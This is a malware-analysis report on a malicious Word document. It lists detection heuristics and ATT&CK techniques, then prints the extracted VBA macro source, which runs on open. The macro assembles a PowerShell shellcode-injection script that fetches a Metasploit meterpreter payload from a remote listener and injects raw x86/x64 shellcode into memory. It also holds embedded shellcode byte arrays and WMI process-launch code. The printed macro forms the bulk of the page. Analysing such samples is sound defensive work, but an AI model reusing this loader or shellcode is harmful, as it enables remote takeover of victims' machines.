MALICIOUS
666
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1204.002 Malicious File
T1087.001 Local Account
T1059.001 PowerShell
The sample contains multiple VBA macros designed to execute code, including references to PowerShell and WMI for process creation. The AutoOpen, Auto_Open, and Document_Open macros all call a function 'P' which appears to construct and execute PowerShell commands. The reconstructed PowerShell command includes a reference to '192.168.1.29.1' which is likely a C2 server for a reverse HTTP meterpreter payload. The presence of VirtualAlloc and WriteProcessMemory API calls suggests the execution of shellcode.
Heuristics 18
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
ClamAV: Doc.Dropper.Donoff-5743532-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743532-0
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
VBA macros detected medium 8 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
[Sy" jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell" jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)" -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
" jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)" " -
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.Matched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
strComputer = "." Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() P -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Sub Document_Open() P -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Customizable = True Sub Auto_Open() P -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32119 bytes |
SHA-256: 68e73dbc0fe17466fea2dad8c4ecb16be3304933b8ffa998b4450b19207117d4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
P
End Sub
Sub AutoOpen()
P
End Sub
Sub Document_Open()
P
End Sub
Public Function P() As Variant
Dim jC As String
jC = "function Invoke-Shellcode"
{
[CmdletBinding( Defa"
jC = jC + "ultParameterSetName = 'RunLocal', SupportsShouldPr"
jC = jC + "ocess = $True , ConfirmImpact = 'High')] Param ("
"
jC = jC + " [ValidateNotNullOrEmpty()]"
[UInt16]
"
jC = jC + "$ProcessID,"
[Parameter( ParameterSetName = 'R"
jC = jC + "unLocal' )]"
[ValidateNotNullOrEmpty()]
["
jC = jC + "Byte[]]"
$Shellcode,
[Parameter( Paramete"
jC = jC + "rSetName = 'Metasploit' )]"
[ValidateSet( 'win"
jC = jC + "dows/meterpreter/reverse_http',"
"
jC = jC + " 'windows/meterpreter/reverse_https',"
"
jC = jC + " IgnoreCase = $True )]"
[String]
$P"
jC = jC + "ayload = 'windows/meterpreter/reverse_http',"
"
jC = jC + "[Parameter( ParameterSetName = 'ListPayloads' )]"
"
jC = jC + " [Switch]"
$ListMetasploitPayloads,
[P"
jC = jC + "arameter( Mandatory = $True,"
Para ""
jC = jC + "meterSetName = 'Metasploit' )]"
[ValidateNotNu"
jC = jC + "llOrEmpty()]"
[String]
$Lhost = '192.168.1.29."
jC = jC + "1',"
[Parameter( Mandatory = $True,
"
jC = jC + " ParameterSetName = 'Metasploit' )]"
[Va"
jC = jC + "lidateRange( 1,65535 )]"
[Int]
$Lport = 80"
jC = jC + "443,"
[Parameter( ParameterSetName = 'Metasplo"
jC = jC + "it' )]"
[ValidateNotNull()]
[String]
"
jC = jC + " $UserAgent = (Get-ItemProperty -Path 'HKCU:\Softw"
jC = jC + "are\Microsoft\Windows\CurrentVersion\Internet Sett"
jC = jC + "ings').'User Agent',"
[Parameter( ParameterSet"
jC = jC + "Name = 'Metasploit' )]"
[ValidateNotNull()]
"
jC = jC + " [Switch]"
$Legacy = $False,
[Parameter"
jC = jC + "( ParameterSetName = 'Metasploit' )]"
[Validat"
jC = jC + "eNotNull()]"
[Switch]
$Proxy = $False,
"
jC = jC + " [Switch]"
$Force = $False
)
Set-Stric"
jC = jC + "tMode -Version 2.0"
if ($PsCmdlet.ParameterSet"
jC = jC + "Name -eq 'ListPayloads')"
{
$Availabl"
jC = jC + "ePayloads = (Get-Command Invoke-Shellcode).Paramet"
jC = jC + "ers['Payload'].Attributes |"
Where-Obj"
jC = jC + "ect {$_.TypeId -eq [System.Management.Automation.V"
jC = jC + "alidateSetAttribute]}"
foreach ($Payload i"
jC = jC + "n $AvailablePayloads.ValidValues)"
{
"
jC = jC + " New-Object PSObject -Property @{ Payloads "
jC = jC + "= $Payload }"
}
Return
}
"
jC = jC + " if ( $PSBoundParameters['ProcessID'] )"
{
"
jC = jC + " Get-Process -Id $ProcessID -ErrorAction Sto"
jC = jC + "p | Out-Null"
}
function Local:Get-Delega"
jC = jC + "teType"
{
Param
(
"
jC = jC + " [OutputType([Type])]"
[Parameter( P"
jC = jC + "osition = 0)]"
[Type[]]
$"
jC = jC + "Parameters = (New-Object Type[](0)),"
"
jC = jC + "[Parameter( Position = 1 )]"
[Type]
"
jC = jC + " $ReturnType = [Void]"
)
"
jC = jC + " $Domain = [AppDomain]::CurrentDomain"
$D"
jC = jC + "ynAssembly = New-Object System.Reflection.Assembly"
jC = jC + "Name('ReflectedDelegate')"
$AssemblyBuilde"
jC = jC + "r = $Domain.DefineDynamicAssembly($DynAssembly, [S"
jC = jC + "ystem.Reflection.Emit.AssemblyBuilderAccess]::Run)"
jC = jC + ""
$ModuleBuilder = $AssemblyBuilder.Define"
jC = jC + "DynamicModule('InMemoryModule', $false)"
$"
jC = jC + "TypeBuilder = $ModuleBuilder.DefineType('MyDelegat"
jC = jC + "eType', 'Class, Public, Sealed, AnsiClass, AutoCla"
jC = jC + "ss', [System.MulticastDelegate])"
$Constru"
jC = jC + "ctorBuilder = $TypeBuilder.DefineConstructor('RTSp"
jC = jC + "ecialName, HideBySig, Public', [System.Reflection."
jC = jC + "CallingConventions]::Standard, $Parameters)"
"
jC = jC + " $ConstructorBuilder.SetImplementationFlags('Run"
jC = jC + "time, Managed')"
$MethodBuilder = $TypeBui"
jC = jC + "lder.DefineMethod('Invoke', 'Public, HideBySig, Ne"
jC = jC + "wSlot, Virtual', $ReturnType, $Parameters)"
"
jC = jC + " $MethodBuilder.SetImplementationFlags('Runtime, "
jC = jC + "Managed')"
Write-Output $TypeBuilder.Creat"
jC = jC + "eType()"
}
function Local:Get-ProcAddress"
jC = jC + ""
{
Param
(
[Ou"
jC = jC + "tputType([IntPtr])]"
[Parameter( Posit"
jC = jC + "ion = 0, Mandatory = $True )]"
[String"
jC = jC + "]"
$Module,
[Parameter( P"
jC = jC + "osition = 1, Mandatory = $True )]"
[St"
jC = jC + "ring]"
$Procedure
)
"
jC = jC + "$SystemAssembly = [AppDomain]::CurrentDomain.GetAs"
jC = jC + "semblies() |"
Where-Object { $_.Global"
jC = jC + "AssemblyCache -And $_.Location.Split('\\')[-1].Equ"
jC = jC + "als('System.dll') }"
$UnsafeNativeMethods "
jC = jC + "= $SystemAssembly.GetType('Microsoft.Win32.UnsafeN"
jC = jC + "ativeMethods')"
$GetModuleHandle = $Unsafe"
jC = jC + "NativeMethods.GetMethod('GetModuleHandle')"
"
jC = jC + " $GetProcAddress = $UnsafeNativeMethods.GetMethod"
jC = jC + "('GetProcAddress')"
$Kern32Handle = $GetMo"
jC = jC + "duleHandle.Invoke($null, @($Module))"
$tmp"
jC = jC + "Ptr = New-Object IntPtr"
$HandleRef = New-"
jC = jC + "Object System.Runtime.InteropServices.HandleRef($t"
jC = jC + "mpPtr, $Kern32Handle)"
Write-Output $GetPr"
jC = jC + "ocAddress.Invoke($null, @([System.Runtime.InteropS"
jC = jC + "ervices.HandleRef]$HandleRef, $Procedure))"
}
"
jC = jC + ""
function Local:Emit-CallThreadStub ([IntPtr] "
jC = jC + "$BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Archit"
jC = jC + "ecture)"
{
$IntSizePtr = $Architectur"
jC = jC + "e / 8"
function Local:ConvertTo-LittleEndi"
jC = jC + "an ([IntPtr] $Address)"
{
$Li"
jC = jC + "ttleEndianByteArray = New-Object Byte[](0)"
"
jC = jC + " $Address.ToString("X$($IntSizePtr*2)") -spli"
jC = jC + "t '([A-F0-9]{2})' | ForEach-Object { if ($_) { $Li"
jC = jC + "ttleEndianByteArray += [Byte] ('0x{0}' -f $_) } }"
"
jC = jC + ""
[System.Array]::Reverse($LittleEndian"
jC = jC + "ByteArray)"
Write-Output $LittleEndian"
jC = jC + "ByteArray"
}
$CallStub = New-Obje"
jC = jC + "ct Byte[](0)"
if ($IntSizePtr -eq 8)
"
jC = jC + " {"
[Byte[]] $CallStub = 0x48,0xB8 "
jC = jC + " # MOV QWORD RAX, &shellcode"
jC = jC + ""
$CallStub += ConvertTo-LittleEndian "
jC = jC + "$BaseAddr # &shellcode"
$CallStu"
jC = jC + "b += 0xFF,0xD0 # CALL"
jC = jC + " RAX"
$CallStub += 0x6A,0x00 "
jC = jC + " # PUSH BYTE 0"
$"
jC = jC + "CallStub += 0x48,0xB8 "
jC = jC + " # MOV QWORD RAX, &ExitThread"
$Call"
jC = jC + "Stub += ConvertTo-LittleEndian $ExitThreadAddr # &"
jC = jC + "ExitThread"
$CallStub += 0xFF,0xD0 "
jC = jC + " # CALL RAX"
}
"
jC = jC + " else"
{
[Byte[]] $Cal"
jC = jC + "lStub = 0xB8 # MOV DWO"
jC = jC + "RD EAX, &shellcode"
$CallStub += Conve"
jC = jC + "rtTo-LittleEndian $BaseAddr # &shellcode"
"
jC = jC + " $CallStub += 0xFF,0xD0 "
jC = jC + " # CALL EAX"
$CallStub += "
jC = jC + "0x6A,0x00 # PUSH BYT"
jC = jC + "E 0"
$CallStub += 0xB8 "
jC = jC + " # MOV DWORD EAX, &ExitThread"
"
jC = jC + ""
$CallStub += ConvertTo-LittleEndian $"
jC = jC + "ExitThreadAddr # &ExitThread"
$CallStu"
jC = jC + "b += 0xFF,0xD0 # CALL"
jC = jC + " EAX"
}
Write-Output $CallStub
"
jC = jC + " }"
function Local:Inject-RemoteShellcode ("
jC = jC + "[Int] $ProcessID)"
{
$hProcess = $Ope"
jC = jC + "nProcess.Invoke(0x001F0FFF, $false, $ProcessID) # "
jC = jC + "ProcessAccessFlags.All (0x001F0FFF)"
if (!"
jC = jC + "$hProcess)"
{
Throw "Unable t"
jC = jC + "o open a process handle for PID: $ProcessID"
"
jC = jC + " }"
$IsWow64 = $false
if ($64b"
jC = jC + "itCPU) # Only perform theses checks if CPU is 64-b"
jC = jC + "it"
{
$IsWow64Process.Invoke("
jC = jC + "$hProcess, [Ref] $IsWow64) | Out-Null"
"
jC = jC + " if ((!$IsWow64) -and $PowerShell32bit)"
"
jC = jC + " {"
Throw 'Unable to inject 64-b"
jC = jC + "it shellcode from within 32-bit Powershell. Use th"
jC = jC + "e 64-bit version of Powershell if you want this to"
jC = jC + " work.'"
}
elseif ($IsWow"
jC = jC + "64) # 32-bit Wow64 process"
{
"
jC = jC + " if ($Shellcode32.Length -eq 0)"
"
jC = jC + " {"
Throw 'No shellcode "
jC = jC + "was placed in the $Shellcode32 variable!'"
"
jC = jC + " }"
$Shellcode = $Shellcod"
jC = jC + "e32"
}
else # 64-bit proc"
jC = jC + "ess"
{
if ($Shellcode"
jC = jC + "64.Length -eq 0)"
{
"
jC = jC + " Throw 'No shellcode was placed in the $Shel"
jC = jC + "lcode64 variable!'"
}
"
jC = jC + " $Shellcode = $Shellcode64"
}
"
jC = jC + " }"
else # 32-bit CPU
{
"
jC = jC + " if ($Shellcode32.Length -eq 0)"
"
jC = jC + " {"
Throw 'No shellcode was place"
jC = jC + "d in the $Shellcode32 variable!'"
}
"
jC = jC + " $Shellcode = $Shellcode32"
}
"
jC = jC + " $RemoteMemAddr = $VirtualAllocEx.Invoke($hP"
jC = jC + "rocess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3"
jC = jC + "000, 0x40) # (Reserve|Commit, RWX)"
if (!$"
jC = jC + "RemoteMemAddr)"
{
Throw "Unab"
jC = jC + "le to allocate shellcode memory in PID: $ProcessID"
jC = jC + ""
}
$WriteProcessMemory.Invoke($"
jC = jC + "hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.L"
jC = jC + "ength, [Ref] 0) | Out-Null"
$ExitThreadAdd"
jC = jC + "r = Get-ProcAddress kernel32.dll ExitThread"
"
jC = jC + " if ($IsWow64)"
{
$CallStub"
jC = jC + " = Emit-CallThreadStub $RemoteMemAddr $ExitThreadA"
jC = jC + "ddr 32"
}
Else
{
"
jC = jC + " $CallStub = Emit-CallThreadStub $RemoteMemAd"
jC = jC + "dr $ExitThreadAddr 64"
}
$RemoteS"
jC = jC + "tubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPt"
jC = jC + "r]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reser"
jC = jC + "ve|Commit, RWX)"
if (!$RemoteStubAddr)
"
jC = jC + " {"
Throw "Unable to allocate thr"
jC = jC + "ead call stub memory in PID: $ProcessID"
"
jC = jC + "}"
$WriteProcessMemory.Invoke($hProcess, $"
jC = jC + "RemoteStubAddr, $CallStub, $CallStub.Length, [Ref]"
jC = jC + " 0) | Out-Null"
$ThreadHandle = $CreateRem"
jC = jC + "oteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $Re"
jC = jC + "moteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)"
"
jC = jC + " if (!$ThreadHandle)"
{
"
jC = jC + " Throw "Unable to launch remote thread in PID: $P"
jC = jC + "rocessID"
}
$CloseHandle.Invoke("
jC = jC + "$hProcess) | Out-Null"
}
function Local:I"
jC = jC + "nject-LocalShellcode"
{
if ($PowerShe"
jC = jC + "ll32bit) {"
if ($Shellcode32.Length -e"
jC = jC + "q 0)"
{
Throw 'No she"
jC = jC + "llcode was placed in the $Shellcode32 variable!'"
"
jC = jC + " return"
}
"
jC = jC + " $Shellcode = $Shellcode32"
}
els ""
jC = jC + "e"
{
if ($Shellcode64.Length "
jC = jC + "-eq 0)"
{
Throw 'No s"
jC = jC + "hellcode was placed in the $Shellcode64 variable!'"
jC = jC + ""
Return
}
"
jC = jC + " $Shellcode = $Shellcode64"
}
$"
jC = jC + "BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero,"
jC = jC + " $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|C"
jC = jC + "ommit, RWX)"
if (!$BaseAddress)
{"
jC = jC + ""
Throw "Unable to allocate shellcode "
jC = jC + "memory in PID: $ProcessID"
}
[Sy"
jC = jC + "stem.Runtime.InteropServices.Marshal]::Copy($Shell"
jC = jC + "code, 0, $BaseAddress, $Shellcode.Length)"
"
jC = jC + " $ExitThreadAddr = Get-ProcAddress kernel32.dll Ex"
jC = jC + "itThread"
if ($PowerShell32bit)
{"
jC = jC + ""
$CallStub = Emit-CallThreadStub $Bas"
jC = jC + "eAddress $ExitThreadAddr 32"
}
el ""
jC = jC + "se"
{
$CallStub = Emit-CallTh"
jC = jC + "readStub $BaseAddress $ExitThreadAddr 64"
"
jC = jC + "}"
$CallStubAddress = $VirtualAlloc.Invoke"
jC = jC + "([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x4"
jC = jC + "0) # (Reserve|Commit, RWX)"
if (!$CallStub"
jC = jC + "Address)"
{
Throw "Unable to "
jC = jC + "allocate thread call stub."
}
[S"
jC = jC + "ystem.Runtime.InteropServices.Marshal]::Copy($Call"
jC = jC + "Stub, 0, $CallStubAddress, $CallStub.Length)"
"
jC = jC + " $ThreadHandle = $CreateThread.Invoke([IntPtr]:"
jC = jC + ":Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntP"
jC = jC + "tr]::Zero)"
if (!$ThreadHandle)
{"
jC = jC + ""
Throw "Unable to launch thread."
"
jC = jC + " }"
$WaitForSingleObject.Invoke($Thre"
jC = jC + "adHandle, 0xFFFFFFFF) | Out-Null"
$Virtual"
jC = jC + "Free.Invoke($CallStubAddress, $CallStub.Length + 1"
jC = jC + ", 0x8000) | Out-Null # MEM_RELEASE (0x8000)"
"
jC = jC + " $VirtualFree.Invoke($BaseAddress, $Shellcode.Le"
jC = jC + "ngth + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000"
jC = jC + ")"
}
$IsWow64ProcessAddr = Get-ProcAddres"
jC = jC + "s kernel32.dll IsWow64Process"
if ($IsWow64Pro"
jC = jC + "cessAddr)"
{
$IsWow64ProcessDelegate "
jC = jC + "= Get-DelegateType @([IntPtr], [Bool].MakeByRefTyp"
jC = jC + "e()) ([Bool])"
$IsWow64Process = [System.R"
jC = jC + "untime.InteropServices.Marshal]::GetDelegateForFun"
jC = jC + "ctionPointer($IsWow64ProcessAddr, $IsWow64ProcessD"
jC = jC + "elegate)"
$64bitCPU = $true
}
el ""
jC = jC + "se"
{
$64bitCPU = $false
}
"
jC = jC + "if ([IntPtr]::Size -eq 4)"
{
$PowerSh"
jC = jC + "ell32bit = $true"
}
Else
{
"
jC = jC + "$PowerShell32bit = $false"
}
if ($PsCmdle"
jC = jC + "t.ParameterSetName -eq 'Metasploit')"
{
"
jC = jC + " if (!$PowerShell32bit) {"
$RootInvo"
jC = jC + "cation = $MyInvocation.Line"
$Response"
jC = jC + " = $True"
if ( $Force -or ( $Response "
jC = jC + "= $psCmdlet.ShouldContinue( "Do you want to launch"
jC = jC + " the payload from x86 Powershell?",
"
jC = jC + " "Attempt to execute 32-bit shellcode from 64"
jC = jC + "-bit Powershell. Note: This process takes about on"
jC = jC + "e minute. Be patient! You will also see some artif"
jC = jC + "acts of the script loading in the other process." "
jC = jC + ") ) ) { }"
if ( !$Response )
"
jC = jC + " {"
Return
}
"
jC = jC + " if ($MyInvocation.BoundParameters['Force']"
jC = jC + ")"
{
$Command = "func"
jC = jC + "tion $($MyInvocation.InvocationName) {`n" + $MyInv"
jC = jC + "ocation.MyCommand.ScriptBlock + "`n}`n$($RootInvoc"
jC = jC + "ation)`n`n"
}
Else
"
jC = jC + " {"
$Command = "function $("
jC = jC + "$MyInvocation.InvocationName) {`n" + $MyInvocation"
jC = jC + ".MyCommand.ScriptBlock + "`n}`n$($RootInvocation) "
jC = jC + "-Force`n`n"
}
$CommandBy"
jC = jC + "tes = [System.Text.Encoding]::Ascii.GetBytes($Comm"
jC = jC + "and)"
$EncodedCommand = [Convert]::ToB"
jC = jC + "ase64String($CommandBytes)"
$Execute ="
jC = jC + " '$Command' + " | $Env:windir\SysWOW64\WindowsPowe"
jC = jC + "rShell\v1.0\powershell.exe -NoProfile -Command -"
"
jC = jC + ""
Invoke-Expression -Command $Execute |"
jC = jC + " Out-Null"
Return
}
"
jC = jC + "$Response = $True"
if ( $Force -or ( $Resp"
jC = jC + "onse = $psCmdlet.ShouldContinue( "Do you know what"
jC = jC + " you're doing?",
"About to downloa"
jC = jC + "d Metasploit payload '$($Payload)' LHOST=$($Lhost)"
jC = jC + ", LPORT=$($Lport)" ) ) ) { }
if ( !$Respo"
jC = jC + "nse )"
{
Return
}
"
jC = jC + " switch ($Payload)"
{
'"
jC = jC + "windows/meterpreter/reverse_http'"
{
"
jC = jC + " $SSL = ''"
}
"
jC = jC + " 'windows/meterpreter/reverse_https'"
"
jC = jC + " {"
$SSL = 's'
"
jC = jC + "[System.Net.ServicePointManager]::ServerCertificat"
jC = jC + "eValidationCallback = {$True}"
}
"
jC = jC + " }"
if ($Legacy)
{
"
jC = jC + " $Request = "http$($SSL)://$($Lhost):$($Lport)/I"
jC = jC + "NITM"
} else {
$CharArray = "
jC = jC + "48..57 + 65..90 + 97..122 | ForEach-Object {[Char]"
jC = jC + "$_}"
$SumTest = $False
wh ""
jC = jC + "ile ($SumTest -eq $False) "
{
"
jC = jC + " $GeneratedUri = $CharArray | Get-Random -"
jC = jC + "Count 4"
$SumTest = (([int[]] $Gen"
jC = jC + "eratedUri | Measure-Object -Sum).Sum % 0x100 -eq 9"
jC = jC + "2)"
}
$RequestUri = -join"
jC = jC + " $GeneratedUri"
$Request = "http$($SSL"
jC = jC + ")://$($Lhost):$($Lport)/$($RequestUri)"
"
jC = jC + "}"
$Uri = New-Object Uri($Request)
"
jC = jC + " $WebClient = New-Object System.Net.WebClient"
"
jC = jC + " $WebClient.Headers.Add('user-agent', "$UserA"
jC = jC + "gent")
if ($Proxy)
{
"
jC = jC + " $WebProxyObject = New-Object System.Net.WebProxy"
jC = jC + ""
$ProxyAddress = (Get-ItemProperty -P"
jC = jC + "ath 'HKCU:\Software\Microsoft\Windows\CurrentVersi"
jC = jC + "on\Internet Settings').ProxyServer"
if"
jC = jC + " ($ProxyAddress) "
{
"
jC = jC + "$WebProxyObject.Address = $ProxyAddress"
"
jC = jC + " $WebProxyObject.UseDefaultCredentials = $Tr"
jC = jC + "ue"
$WebClientObject.Proxy = $WebP"
jC = jC + "roxyObject"
}
}
try
"
jC = jC + ""
{
[Byte[]] $Shellcode32 = $W"
jC = jC + "ebClient.DownloadData($Uri)"
}
ca ""
jC = jC + "tch"
{
Throw "$($Error[0].Exc"
jC = jC + "eption.InnerException.InnerException.Message)"
"
jC = jC + " }"
[Byte[]] $Shellcode64 = $Shellcod"
jC = jC + "e32"
}
elseif ($PSBoundParameters['Shellc"
jC = jC + "ode'])"
{
[Byte[]] $Shellcode32 = $Sh"
jC = jC + "ellcode"
[Byte[]] $Shellcode64 = $Shellcod"
jC = jC + "e32"
}
Else
{
[Byte[]] $She"
jC = jC + "llcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x"
jC = jC + "89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,"
"
jC = jC + " 0x52,0x0c,0x8b,0x52,0"
jC = jC + "x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0"
jC = jC + "x31,0xc0,"
0 xac , ""
jC = jC + "0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,"
jC = jC + "0xc7,0xe2,0xf0,0x52,0x57,"
"
jC = jC + " 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0"
jC = jC + ",0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,"
"
jC = jC + " 0xd0,0x50,0x8b,0x48,0x1"
jC = jC + "8,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x3"
jC = jC + "4,0x8b,"
0x01,0x"
jC = jC + "d6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0x"
jC = jC + "c7,0x38,0xe0,0x75,0xf4,"
"
jC = jC + " 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0"
jC = jC + "x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,"
"
jC = jC + " 0x0c,0x4b,0x8b,0x58,0x1c,"
jC = jC + "0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"
jC = jC + "0x24,"
0x5b,0x5b"
jC = jC + ",0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b"
jC = jC + ",0x12,0xeb,0x86,0x5d,"
"
jC = jC + " 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x5"
jC = jC + "0,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,"
"
jC = jC + " 0xbb,0xe0,0x1d,0x2a,0x0a,0x"
jC = jC + "68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x"
jC = jC + "0a,"
0x80,0xfb,0"
jC = jC + "xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0"
jC = jC + "x53,0xff,0xd5,0x63,"
"
jC = jC + " 0x61,0x6c,0x63,0x00)"
[Byte[]] $Shell"
jC = jC + "code64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00"
jC = jC + ",0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,"
"
jC = jC + " 0x56,0x48,0x31,0xd2,0x6"
jC = jC + "5,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8"
jC = jC + "b,0x52,"
0x20,0x"
jC = jC + "48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x"
jC = jC + "31,0xc9,0x48,0x31,0xc0,"
"
jC = jC + " 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0"
jC = jC + "xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,"
"
jC = jC + " 0x52,0x41,0x51,0x48,0x8b,"
jC = jC + "0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,"
jC = jC + "0x88,"
0x00,0x00"
jC = jC + ",0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50"
jC = jC + ",0x8b,0x48,0x18,0x44,"
"
jC = jC + " 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x4"
jC = jC + "8,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,"
"
jC = jC + " 0x01,0xd6,0x4d,0x31,0xc9,0x"
jC = jC + "48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0x"
jC = jC + "c1,"
0x38,0xe0,0"
jC = jC + "x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0"
jC = jC + "x75,0xd8,0x58,0x44,"
"
jC = jC + " 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,"
jC = jC + "0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,"
"
jC = jC + " 0x01,0xd0,0x41,0x8b,0x04,0x88"
jC = jC + ",0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a"
jC = jC + ","
0x41,0x58,0x4"
jC = jC + "1,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xf"
jC = jC + "f,0xe0,0x58,0x41,"
"
jC = jC + " 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0x"
jC = jC + "ff,0x5d,0x48,0xba,0x01,0x00,0x00,"
"
jC = jC + " 0x00,0x00,0x00,0x00,0x00,0x48,0"
jC = jC + "x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,"
"
jC = jC + ""
0x6f,0x87,0xff,"
jC = jC + "0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,"
jC = jC + "0xbd,0x9d,0xff,"
"
jC = jC + " 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80"
jC = jC + ",0xfb,0xe0,0x75,0x05,0xbb,0x47,"
"
jC = jC + " 0x13,0x72,0x6f,0x6a,0x00,0x59,0x4"
jC = jC + "1,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)"
"
jC = jC + " }"
if ( $PSBoundParameters['ProcessID'] )
"
jC = jC + " {"
$OpenProcessAddr = Get-ProcAddress "
jC = jC + "kernel32.dll OpenProcess"
$OpenProcessDele"
jC = jC + "gate = Get-DelegateType @([UInt32], [Bool], [UInt3"
jC = jC + "2]) ([IntPtr])"
$OpenProcess = [System.Run"
jC = jC + "time.InteropServices.Marshal]::GetDelegateForFunct"
jC = jC + "ionPointer($OpenProcessAddr, $OpenProcessDelegate)"
jC = jC + ""
